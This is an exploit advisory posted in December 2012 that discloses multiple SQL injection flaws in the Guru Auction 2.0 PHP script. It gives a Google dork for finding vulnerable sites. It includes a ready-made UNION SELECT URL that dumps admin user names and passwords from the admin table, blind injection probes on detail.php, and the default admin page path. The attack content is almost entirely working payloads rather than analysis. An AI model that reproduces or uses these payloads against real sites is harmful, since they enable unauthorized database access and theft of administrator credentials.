Home / exploits Guru Auction 2.0 SQL Injection
Posted on 27 December 2012
) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /( )())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )()) ((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_) __ ((_)((_)/(_))___ ((_) _ ) )\___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) / / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ / V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_ \___/_/ \_|_|_|___/|___|_|_\____|___||_|\_|_|\_ .WEB.ID ----------------------------------------------------------------------- Guru Auction 2.0 Multiple SQL Injection Vulnerabilities ----------------------------------------------------------------------- Author : v3n0m Site : http://ycl.sch.id/ Date : December, 26-2012 Location : Yogyakarta, Indonesia Time Zone : GMT +7:00 Application : Guru Auction 2.0 Price : $49 Vendor : http://www.guruscript.com/ Google Dork : inurl:subcat.php?cate_id= ----------------------------------------------------------------------- SQLi p0c: ~~~~~~~~~ http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- Blind SQLi p0c: ~~~~~~~~~ http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false Default Admin Page: ~~~~~~~~~ http://domain.tld/[path]/admin/ ----------------------------------------------------------------------- Thanks: LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0
